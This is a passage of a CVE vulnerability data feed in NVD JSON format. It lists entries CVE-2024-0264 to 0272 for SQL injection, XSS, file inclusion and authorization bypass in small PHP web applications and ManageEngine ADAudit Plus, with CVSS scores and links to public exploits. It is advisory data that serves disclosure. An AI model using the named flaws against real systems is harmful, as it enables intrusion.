: "https://0day.today/exploit/description/39212", "name" : "https://0day.today/exploit/description/39212", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://0day.today/exploit/description/39212", "name" : "https://0day.today/exploit/description/39212", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html", "name" : "https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249819", "name" : "https://vuldb.com/?ctiid.249819", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249819", "name" : "https://vuldb.com/?ctiid.249819", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249819", "name" : "https://vuldb.com/?id.249819", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249819", "name" : "https://vuldb.com/?id.249819", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=HWOGeg3e5As", "name" : "https://www.youtube.com/watch?v=HWOGeg3e5As", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://www.youtube.com/watch?v=HWOGeg3e5As", "name" : "https://www.youtube.com/watch?v=HWOGeg3e5As", "refsource" : "", "tags" : [ "Exploit" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in ACME Ultra Mini HTTPd 1.21. It has been classified as problematic. This affects an unknown part of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249819." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:acme:ultra_mini_httpd:1.21:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0264", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249820", "name" : "https://vuldb.com/?ctiid.249820", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249820", "name" : "https://vuldb.com/?ctiid.249820", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249820", "name" : "https://vuldb.com/?id.249820", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249820", "name" : "https://vuldb.com/?id.249820", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /LoginRegistration.php. The manipulation of the argument formToken leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249820." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:clinic_queuing_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-07T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0265", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "name" : "https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249821", "name" : "https://vuldb.com/?ctiid.249821", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249821", "name" : "https://vuldb.com/?ctiid.249821", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249821", "name" : "https://vuldb.com/?id.249821", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249821", "name" : "https://vuldb.com/?id.249821", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component GET Parameter Handler. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249821 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:oretnom23:clinic_queuing_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-07T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0266", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing", "name" : "https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing", "name" : "https://drive.google.com/file/d/1U60z1xzBzJjalbmwBmPD5NjJ4pPaDevF/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249822", "name" : "https://vuldb.com/?ctiid.249822", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249822", "name" : "https://vuldb.com/?ctiid.249822", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249822", "name" : "https://vuldb.com/?id.249822", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249822", "name" : "https://vuldb.com/?id.249822", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in Project Worlds Online Lawyer Management System 1.0. Affected is an unknown function of the component User Registration. The manipulation of the argument First Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249822 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:yugeshverma:online_lawyer_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-07T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0267", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%201.pdf", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249823", "name" : "https://vuldb.com/?ctiid.249823", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249823", "name" : "https://vuldb.com/?ctiid.249823", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249823", "name" : "https://vuldb.com/?id.249823", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249823", "name" : "https://vuldb.com/?id.249823", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Kashipara Hospital Management System up to 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Parameter Handler. The manipulation of the argument email/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249823." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:surajghosh:hospital_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-07T06:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0268", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Hospital%20Managment%20System/Hospital%20Managment%20System%20-%20vuln%202.pdf", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249824", "name" : "https://vuldb.com/?ctiid.249824", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.249824", "name" : "https://vuldb.com/?ctiid.249824", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249824", "name" : "https://vuldb.com/?id.249824", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.249824", "name" : "https://vuldb.com/?id.249824", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Kashipara Hospital Management System up to 1.0. Affected by this issue is some unknown functionality of the file registration.php. The manipulation of the argument name/email/pass/gender/age/city leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249824." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:surajghosh:hospital_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-07T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0269", "ASSIGNER" : "cna@manageengine.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "name" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "name" : "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in File-Summary DrillDown. This issue has been fixed and released in version 7271." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7201:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7202:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*", "versionEndExcluding" : "7.2", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7200:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7250:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7203:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7210:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7211:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7212:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7213:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7215:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7220:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7260:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7251:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:zohocorp:manageengine_adaudit_plus:7.2:7270:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-02T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0270", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%201.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249825", "name" : "https://vuldb.com/?ctiid.249825", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249825", "name" : "https://vuldb.com/?ctiid.249825", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249825", "name" : "https://vuldb.com/?id.249825", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249825", "name" : "https://vuldb.com/?id.249825", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file item_list_submit.php. The manipulation of the argument item_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249825 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T08:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0271", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%206.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249826", "name" : "https://vuldb.com/?ctiid.249826", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249826", "name" : "https://vuldb.com/?ctiid.249826", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249826", "name" : "https://vuldb.com/?id.249826", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249826", "name" : "https://vuldb.com/?id.249826", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. This vulnerability affects unknown code of the file addmaterial_edit.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249826 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T09:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0272", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%208.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249827", "name" : "https://vuldb.com/?ctiid.249827", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249827", "name" : "https://vuldb.com/?ctiid.249827", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249827", "name" : "https://vuldb.com/?id.249827", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249827", "name" : "https://vuldb.com/?id.249827", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file addmaterialsubmit.php. The manipulation of the argument material_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249827." } ] } }, 